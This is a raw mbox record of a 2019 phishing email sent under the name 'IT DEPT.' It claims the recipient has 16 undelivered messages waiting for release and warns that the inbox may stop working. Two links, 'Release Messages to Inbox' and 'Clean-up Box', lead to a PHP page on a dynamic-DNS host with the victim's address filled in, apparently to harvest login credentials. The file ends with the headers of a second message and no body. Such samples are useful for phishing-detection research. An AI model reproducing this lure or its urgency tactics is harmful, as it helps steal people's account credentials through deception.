From: "IT DEPT. " <aju@brandmeadv.com>
To: jose@monkey.org
Subject: Release Undeliverable_Emails
Date: 25 Aug 2019 14:44:33 +0200
Message-ID: <20190825144433.5D62DFFB8579CD73@brandmeadv.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Easynet-ES-Outgoing-Spam-Score: 0.1 (/)
X-Outgoing-Spam-Report: Spam detection software, running on the system "aspam1.nsa.es.easynet.net", has
 identified this incoming email as possible spam.  The original message
 has been attached to this so you can view it (if it isn't spam) or label
 similar future email.  If you have any questions, see
 @@CONTACT_ADDRESS@@ for details.
 
 Content preview:  Email: jose@monkey.org , You have {16} undelivared messages
    clustered on your cloud, awaiting approval from you to be delivared. please
    note, this is likely to cause inbox to cease function in incoming messages,
    follow this instruction: [...] 
 
 Content analysis details:   (0.1 points, 5.0 required)
 
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
 -1.0 ALL_TRUSTED            Passed through trusted hosts only via SMTP
  0.0 HTML_MESSAGE           BODY: HTML included in message
  1.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
X-Outgoing-SpamScan-Signature: 191f340b572413c557f8f6111c1e7a0b
X-Easynet-bounce-key: easynet.es;aju@brandmeadv.com;1566737467;82160696;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 161

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19400"></HEAD>
<body style=3D"MARGIN: 0.5em">
<P>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'>Email:<SPAN>&nbsp;</SPAN></SPAN>
 <SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI=
", "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: no=
rmal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb=
(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norm=
al; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-liga=
tures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; t=
ext-decoration-style: initial;=20
text-decoration-color: initial'><FONT color=3D#073763>jose@monkey.org</FONT=
><FONT color=3D#212121>&nbsp;,</FONT></SPAN>
 <BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI",=
 "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norm=
al; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(3=
3,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal=
; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatu=
res: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; tex=
t-decoration-style: initial; text-decoration-color:=20
initial'>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'>You have {16} undelivared messages clustere=
d on your cloud, awaiting approval from you to be delivared.</SPAN>
 <BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI",=
 "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norm=
al; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(3=
3,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal=
; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatu=
res: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; tex=
t-decoration-style: initial; text-decoration-color:=20
initial'>
<BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", =
"Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33=
,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal;=
 BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text=
-decoration-style: initial; text-decoration-color:=20
initial'>
<SPAN style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI"=
, "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligat=
ures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial;=20
text-decoration-color: initial'>please note, this is likely to cause inbox =
to cease function in incoming messages, follow this instruction:&nbsp;</SPA=
N>
 <BR style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI",=
 "Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: norm=
al; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(3=
3,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal=
; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatu=
res: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; tex=
t-decoration-style: initial; text-decoration-color:=20
initial'></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", "=
Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: normal=
; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,=
33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; =
BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligature=
s: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-=
decoration-style: initial; text-decoration-color:=20
initial'><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://tate.ddns.net/e=
x/XZXXSE345CDC/BBBBBRR4444444/101454858.php?email=3Djose@monkey.org" rel=3D=
"noopener noreferrer" target=3D_blank>1. Release Messages to Inbox</A></P>
<P style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal, "Segoe UI", "=
Segoe WP", Tahoma, Arial, sans-serif, serif, EmojiFont; WHITE-SPACE: normal=
; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,=
33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; =
BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligature=
s: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-=
decoration-style: initial; text-decoration-color:=20
initial'><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://tate.ddns.net/e=
x/XZXXSE345CDC/BBBBBRR4444444/101454858.php?email=3Djose@monkey.org" rel=3D=
"noopener noreferrer" target=3D_blank>2. Clean-up Box</A></P></BODY></HTML>=


From jose@monkey.org Mon Aug 26 00:31:30 2019 +0000
Return-Path: r.palma@aospterni.it
Delivered-To: jose@monkey.org
X-FDA: 75862700340.01.592BA2C
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin01.b.hostedemail.com (Postfix) with ESMTP id B3BE3257417;
	Mon, 26 Aug 2019 00:31:30 +0000 (UTC)
X-Spam-Summary: 30,2,0,5496717f43a33fa9,d41d8cd98f00b204,r.palma@aospterni.it,::inf@mail.com,RULES_HIT:2:10:41:72:355:379:541:542:960:962:967:973:978:983:988:989:1021:1029:1155:1160:1189:1208:1221:1260:1261:1263:1308:1309:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1566:1575:1588:1589:1592:1594:1691:1714:1730:1777:1792:2194:2199:2525:2526:2527:2528:2539:2553:2559:2564:2610:2682:2685:2859:2895:2902:2917:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3392:3421:3586:3865:3866:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4049:4119:4321:4361:4379:4416:4552:5007:6117:6261:6658:6678:7688:8583:8603:8957:9025:9080:9108:9111:9163:9388:9855:9868:10004:10026:10049:10197:10214:10346:10919:11656:11658:11914:12043:12438:12517:12519:12555:12658:12679:12895:12986:13025:13110:13139:13141:13163:13229:13230:13237:13439:14096:14659:21080:21433:21451:21554:21627:21819:21881:21917:21939:30054:30070:30083:30090:30091,0,RBL:94.86.59.40:@aospt
 erni.it:
X-HE-Tag: tent97_473b25befac0b
X-Filterd-Recvd-Size: 8704
Received: from mail.aospterni.it (host40-59-static.86-94-b.business.telecomitalia.it [94.86.59.40])
	by imf26.b.hostedemail.com (Postfix) with ESMTP;
	Mon, 26 Aug 2019 00:31:29 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by mail.aospterni.it (Postfix) with ESMTP id 478361701A9C;
	Mon, 26 Aug 2019 02:31:26 +0200 (CEST)
Received: from mail.aospterni.it ([127.0.0.1])
	by localhost (mail.aospterni.it [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id Mx3l9l6B_CzT; Mon, 26 Aug 2019 02:31:25 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.aospterni.it (Postfix) with ESMTP id E03441701A9B;
	Mon, 26 Aug 2019 02:31:24 +0200 (CEST)
Received: from mail.aospterni.it ([127.0.0.1])
	by localhost (mail.aospterni.it [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id Q-THAKWzz3W6; Mon, 26 Aug 2019 02:31:24 +0200 (CEST)
Received: from DESKTOPQJPGR3S (unknown [37.120.135.75])
	by mail.aospterni.it (Postfix) with ESMTPSA id A532C1701A97;
	Mon, 26 Aug 2019 02:31:03 +0200 (CEST)
Reply-To: <yihuma@outlook.com>
